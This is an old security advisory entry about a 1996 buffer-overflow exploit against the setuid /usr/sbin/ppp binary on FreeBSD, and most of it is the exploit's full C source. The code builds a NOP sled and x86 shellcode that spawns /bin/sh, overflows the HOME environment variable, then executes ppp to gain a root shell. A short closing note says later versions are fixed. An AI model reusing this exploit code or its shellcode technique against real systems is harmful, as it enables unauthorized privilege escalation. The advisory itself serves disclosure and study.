COMMAND
	    /usr/sbin/ppp
SYSTEMS AFFECTED
	    FreeBSD
PROBLEM
	    Nirva  made  exploit   for  ppp  under   FreeBSD  systems.    This
	    vulnerability got nothing to do with FreeBSD-SA-96:16.  Note  that
	    this is oldie however (dated 1996).
	
	    /*
	     * Mess with the numbers if it doesnt work.
	     *
	     *      --Nirva 8/4/96
	     */
	    #include <stdio.h>
	    #include <stdlib.h>
	    #include <unistd.h>
	    #define BUFFER_SIZE     156     /* size of the bufer to overflow */
	    #define OFFSET          -290    /* number of bytes to jump after the start
					       of the buffer */
	    long get_esp(void) { __asm__("movl %esp,%eax\n"); }
	    main(int argc, char *argv[])
	    {
		    char *buf = NULL;
		    unsigned long *addr_ptr = NULL;
		    char *ptr = NULL;
		    char execshell[] =
		    "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */
		    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */
		    "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"  /* 20 bytes */
		    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";    /* 15 bytes, 57 total */
		    int i,j;
		    buf = malloc(4096);
		    /* fill start of bufer with nops */
		    i = BUFFER_SIZE-strlen(execshell);
		    memset(buf, 0x90, i);
		    ptr = buf + i;
		    /* place exploit code into the buffer */
		    for(i = 0; i < strlen(execshell); i++)
			    *ptr++ = execshell[i];
		    addr_ptr = (long *)ptr;
		    for(i=0;i < (104/4); i++)
			    *addr_ptr++ = get_esp() + OFFSET;
		    ptr = (char *)addr_ptr;
		    *ptr = 0;
		    setenv("HOME", buf, 1);
		    execl("/usr/sbin/ppp", "ppp", NULL);
	    }
	
SOLUTION
	    This vulnerability  has been  fixed time  ago.   I don't  no exact
	    version,  but  FreeBSD  version  currently  available are safe for
	    sure.